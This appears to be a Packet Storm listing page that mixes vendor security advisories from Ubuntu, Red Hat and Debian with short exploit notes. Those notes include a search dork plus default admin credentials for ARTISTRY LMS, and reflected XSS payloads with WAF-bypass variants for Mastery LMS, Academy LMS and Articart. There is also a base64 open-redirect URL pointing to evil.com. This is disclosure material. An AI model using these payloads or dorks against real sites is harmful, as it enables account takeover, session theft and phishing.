ARTISTRY LIMITED LMS version 0.5 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : ARTISTRY LIMITED LMS v 0.5 Insecure Settings Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.artistrybd.net/                                                                                         |  | # Dork      : "Developed By ARTISTRY LIMITED"                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Appears to leave a default administrative account in place post installation.[+] Use Payload : user & pass = admin[+]  https://127.0.0.1/mother-earthnet/apanel/admin/index.php        ====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

ARTISTRY LIMITED LMS 0.5 Insecure Settings

Ubuntu Security Notice 6215-1 - It was discovered that dwarves incorrectly handled certain memory operations under certain circumstances. An attacker could possibly use this issue to cause dwarves to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6215-1July 11, 2023dwarves-dfsg vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in dwarves.Software Description:- dwarves-dfsg: set of advanced DWARF utilitiesDetails:It was discovered that dwarves incorrectly handled certain memoryoperations under certain circumstances. An attacker could possibly use thisissue to cause dwarves to crash, resulting in a denial of service, orpossibly execute arbitrary code. (CVE-2022-3534, CVE-2022-3606)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  dwarves                         1.21-0ubuntu1~20.04.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):  dwarves                         1.21-0ubuntu1~18.04.1+esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6215-1  CVE-2022-3534, CVE-2022-3606Package Information:  https://launchpad.net/ubuntu/+source/dwarves-dfsg/1.21-0ubuntu1~20.04.1

Ubuntu Security Notice USN-6215-1

Red Hat Security Advisory 2023-4023-01 - The kpatch management tool provides a kernel patching infrastructure which allows you to patch a running kernel without rebooting or restarting any processes. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:4023-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4023  
Issue date:        2023-07-11  
CVE Names:         CVE-2022-2588   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
7.7 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server E4S (v. 7.7) - ppc64le, x86_64

3. Description:

The kpatch management tool provides a kernel patching infrastructure which  
allows you to patch a running kernel without rebooting or restarting any  
processes.

Security Fix(es):

* kernel: a use-after-free in cls_route filter implementation may lead to  
privilege escalation (CVE-2022-2588)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2114849 - CVE-2022-2588 kernel: a use-after-free in cls_route filter implementation may lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kpatch-patch-3_10_0-1062_71_1-1-2.el7.src.rpm  
kpatch-patch-3_10_0-1062_72_1-1-1.el7.src.rpm

ppc64le:  
kpatch-patch-3_10_0-1062_71_1-1-2.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_71_1-debuginfo-1-2.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_72_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_72_1-debuginfo-1-1.el7.ppc64le.rpm

x86_64:  
kpatch-patch-3_10_0-1062_71_1-1-2.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_71_1-debuginfo-1-2.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_72_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_72_1-debuginfo-1-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2588  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrSXcAAoJENzjgjWX9erEGqkP/jbBKXoO2YyTa/52rGr5sdJs  
do2P4bHsggGYyAOYh5MrOl/cZN/JCgVEPBqkwvUMQMFBrHSq9rGBv+gzPqL0i7F4  
h74worbKlUr4c4o8lDuq07IKbwporn4GMv0Cjfi+pxGI2Rs4G9ofIOEHf5+yEKHM  
RE7SAvlxmpT5U2sbkWXgyH/OhOIxScp3vJtSVTT8z6JRQZwC+th0LQkT27wgP8hw  
hVXcNL5D/pBP/0DvMV3MNgaS03nYa4fZcO3fXpfxwGCRFdNEdYoYh+p/ltGnHNIV  
Scche39y9p7Xc5m4qUBIoKzFq9RC56uJUHji4GwOElwxxIzxOJBxxCRPiawBPLgR  
HSvFKkXYRjLillhw6Ce9U7lg17u/h5+XpuzXhgCDP6WeRMXoumtDJkSPVchlDexq  
HD/7GC5jvP7O79WD/UFAiCVsHZtyP6I0JmGQUkXx6riOxuG+7QHJ/nIUY+NNuqmh  
VrkbWrx/FjLKAdMpFFnYAgcmWrOS3RJwLmb/lbTpRUB0QNjO8FD2u+rSl8FewSHt  
yRbR9isi1L1txVe3ajNXj3O2ndQ5ZoT/T89Jrud0eSQvuM68xL9aE5G+ns0WOYBI  
58tWXzVmnDjXMBJZdkid/rSW710mDXKIPIlfUTJeZlhkO+A9Rm59ye6TY+mOw4rd  
36ciUX8RJeDq5hFB0Ih5  
=sPof  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4023-01

Debian Linux Security Advisory 5451-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5451-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
July 09, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-37201 CVE-2023-37202 CVE-2023-37207  
                 CVE-2023-37208 CVE-2023-37211  
Debian Bug     : 971790 1006432

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 1:102.13.0-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 1:102.13.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSq/IEACgkQEMKTtsN8  
TjbbzA//RGC3Tj6WRrccthY5Uxh30CLYzuGvJmlwzd4iH80/8cXZi4dbPu0bSFnP  
wA6qjtNxxeCFcc711699O9LqVGQUBzyK23hp012yHtPb4zjnWwkhZ7FqyZCvgx9d  
H06rtsuOAr2PBlS4bcW3NQy9fH1xMom/+blW6L4IejQ3jXJXmT6B/xZxo0aj39bE  
qNZXxtBWLdiIzVDjXbR7TMT9J+UkvTxyNTXKjf6d3u34LfEIfiHHE8vfZB+JCwwn  
17I8/nsecJglQHXpIu7dNfDNqLmLJPrceBl1R3XMHmA3uQLqQMypT5nsPdWpiMOW  
kOvgmE6jrUUcR7mgQsTcxqD6B5QEztEvOpaRrA7MB5geWewd8E4deksvGwv5Tr9R  
coBM2lzbLRrnbcki83qTjNX8D7B7Urs+uU3YIp/TNSwmaiLIXgwxu7CyzLUif6+7  
+n3GPSMski64qc6WJ0cPajQAmdX2pwtWmyYne5mcKpC3iujj/fQTpZ+Qf5Yuhs/K  
jAd+xqwOXpbEMrCwWBssy92Nj8vWkT2T4vIco1QRxKy3TSBkwubjigZSorKFIx6v  
39a4AeknI0HuH4E3oJ8E6+Um9miptZB4jswlRSRDay7H1AX6bVfs1Bi0L1pozNG6  
lfcugCF+TPFaLRBcBEK3dD4ch47x98rE9bOEZr2ITT2JuP+A1cE=  
=SqjJ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5451-1

Mastery LMS version 1.2 suffers from a cross site scripting vulnerability.

    # Exploit Title: Mastery LMS 1.2 - Reflected XSS# Exploit Author: CraCkEr# Date: 09/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/mastery/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /browseGET parameter 'search' is vulnerable to XSShttps://website/browse?search=[XSS]GET parameter 'featured' is vulnerable to XSShttps://website/browse?featured=[XSS]GET parameter 'recommended' is vulnerable to XSShttps://website/browse?recommended=[XSS]GET parameter 'skill' is vulnerable to XSShttps://website/browse?skill=[XSS]Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script> XSS Filter Bypass : "><script>alert(1)</script>[-] Done

Mastery LMS 1.2 Cross Site Scripting

Academy LMS version 5.15 suffers from a cross site scripting vulnerability.

    # Exploit Title: Academy LMS 5.15 - Reflected XSS# Exploit Author: CraCkEr# Date: 09/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/academy/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /home/coursesGET parameter 'sort_by' is vulnerable to XSShttps://website/home/courses?category=photoshop&price=all&level=all&language=all&rating=all&sort_by=[XSS]Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script> XSS Filter Bypass : ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd[-] Done

Academy LMS 5.15 Cross Site Scripting

Red Hat Security Advisory 2023-4021-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include double free and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:4021-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4021  
Issue date:        2023-07-11  
CVE Names:         CVE-2022-3564   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.6  
Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.6) - noarch, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.6) - x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: use-after-free caused by l2cap_reassemble_sdu() in  
net/bluetooth/l2cap_core.c (CVE-2022-3564)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* The iscsi target deadlocks when the same host acts as an initiator to  
itself (i.e. connects via 127.0.0.1) (BZ#2183541)

* Double free issue in filelayout_alloc_commit_info (BZ#2212878)

* RHEL 7.2: XFS inode cluster corruption [rhel-7.9.z] (BZ#2213361)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2150999 - CVE-2022-3564 kernel: use-after-free caused by l2cap_reassemble_sdu() in net/bluetooth/l2cap_core.c

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.6):

Source:  
kernel-3.10.0-957.104.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-957.104.1.el7.noarch.rpm  
kernel-doc-3.10.0-957.104.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debug-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-devel-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-headers-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-tools-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-957.104.1.el7.x86_64.rpm  
perf-3.10.0-957.104.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
python-perf-3.10.0-957.104.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.6):

x86_64:  
kernel-debug-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-957.104.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrSXAAAoJENzjgjWX9erESlUP/0fvyxMdblwrZxJ9Mpsiak+f  
I5JKDhhBSu8gH1MG8BA+o2GhjjA8xUfF+stwK0kvyrh9BouDLuNtb1APHwwo5eBN  
OfZpxJquC0onbae4qVnxqJ5Vdl85Xa92dYO6PmiDczziKJcn9nQwD6asiKFVppz1  
56DuNYsB0te3yiHC2d6CAm7G2kIM9Q/toj9NbWiDg0VjHQRvU5Q199S9Ux8x66lz  
5zL9Wv6j03Gf/+kwmbyFWvnzJyammZHkORjBV9YQP4kcEmGZiGp5kglCR/wBNmpw  
S3DsWETnEvyigrFxqb6JkzjCE5X8BpsbKLJnHkccv8m8zBhwLXzbgA3AQFnYr0ky  
NtDXYeB7TBLAzQAX5uf/5kkFb6RrPPLz+JWV4wZWryFF3KPvj4Y9TAPbUV0JlBwq  
QFfO+qkQIOYdgiteVJyJZzgpSEEMWBDFI1HgZPD9puhpfalC+stX7nYmBctRZ6kW  
QU60EsACjQPbAKUYoG5NshacXTY5KJ9oaPDRZZfcekKLJ84ezhMOYIAq2RQ4dnqp  
hTAohuvNyuogaV02OVWUyGPN0nzXvWi11bTtIl82zKq5tZnHX8xQbKWjqx/e3xSn  
iopqNnKiijn+VtmBsSwBcbzacqyTL4xojiYEWoy3X6v0OkoSV2OQ30sdOl/BmbNI  
8UeKsoH8XOqGA9+DBst4  
=ZplL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4021-01

Ubuntu Security Notice 6214-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code. P Umar Farooq discovered that Thunderbird did not properly provide warning when opening Diagcab files. If a user were tricked into opening a malicious Diagcab file, an attacker could execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6214-1July 11, 2023thunderbird vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, bypass security restrictions, cross-sitetracing, or execute arbitrary code. (CVE-2023-34414, CVE-2023-34416,CVE-2023-37201, CVE-2023-37202, CVE-2023-37207, CVE-2023-37211)P Umar Farooq discovered that Thunderbird did not properly provide warningwhen opening Diagcab files. If a user were tricked into opening amalicicous Diagcab file, an attacker could execute arbitrary code.(CVE-2023-37208)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:  thunderbird                     1:102.13.0+build1-0ubuntu0.23.04.1Ubuntu 22.10:  thunderbird                     1:102.13.0+build1-0ubuntu0.22.10.1Ubuntu 22.04 LTS:  thunderbird                     1:102.13.0+build1-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:102.13.0+build1-0ubuntu0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6214-1  CVE-2023-34414, CVE-2023-34416, CVE-2023-37201, CVE-2023-37202,  CVE-2023-37207, CVE-2023-37208, CVE-2023-37211Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:102.13.0+build1-0ubuntu0.23.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.13.0+build1-0ubuntu0.22.10.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.13.0+build1-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.13.0+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6214-1

Articart version 2.0.1 suffers from cross site scripting and open redirection vulnerabilities.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : http://articart-demo.livelyworks.net/                                      ││  Vendor   : livelyworks                                                                ││  Software : Articart 2.0.1                                                             ││  Vuln Type: Reflected XSS - Open Redirect using base64 Encoding                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## RXSSPath: /items/searchGET 'search_term' parameter is vulnerable to RXSShttps://website/items/search?search_term=123zr77l%22%3e%3cscript%3ealert(1)%3c%2fscript%3esadj4## Open RedirectAn Attacker can use it to redirect a victim to an arbitrary website. This is a powerful tool inphishing campaigns, as it allows hiding the malicious webpage behind a linkPath: /change-language/de_DEGET 'redirectTo' parameter is vulnerable to Open Redirect using base64 encodinghttps://website/change-language/de_DE?redirectTo=aHR0cHM6Ly93d3cuZXZpbC5jb20vaHR0cHM6Ly93d3cuZXZpbC5jb20v = https://www.evil.com/[-] Done

Articart 2.0.1 Cross Site Scripting / Open Redirection

Ubuntu Security Notice 6213-1 - It was discovered that Ghostscript incorrectly handled pipe devices. If a user or automated system were tricked into opening a specially crafted PDF file, a remote attacker could use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6213-1  
July 10, 2023

ghostscript vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Ghostscript could be made to run programs if it opened a specially crafted  
file.

Software Description:  
- ghostscript: PostScript and PDF interpreter

Details:

It was discovered that Ghostscript incorrectly handled pipe devices. If a  
user or automated system were tricked into opening a specially crafted PDF  
file, a remote attacker could use this issue to execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   ghostscript                     10.0.0~dfsg1-0ubuntu1.2

Ubuntu 22.10:  
   ghostscript                     9.56.1~dfsg1-0ubuntu3.2

Ubuntu 22.04 LTS:  
   ghostscript                     9.55.0~dfsg1-0ubuntu5.3

Ubuntu 20.04 LTS:  
   ghostscript                     9.50~dfsg-5ubuntu4.8

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6213-1  
   CVE-2023-36664

Package Information:  
   https://launchpad.net/ubuntu/+source/ghostscript/10.0.0~dfsg1-0ubuntu1.2  
   https://launchpad.net/ubuntu/+source/ghostscript/9.56.1~dfsg1-0ubuntu3.2  
   https://launchpad.net/ubuntu/+source/ghostscript/9.55.0~dfsg1-0ubuntu5.3  
   https://launchpad.net/ubuntu/+source/ghostscript/9.50~dfsg-5ubuntu4.8

Source

Packet Storm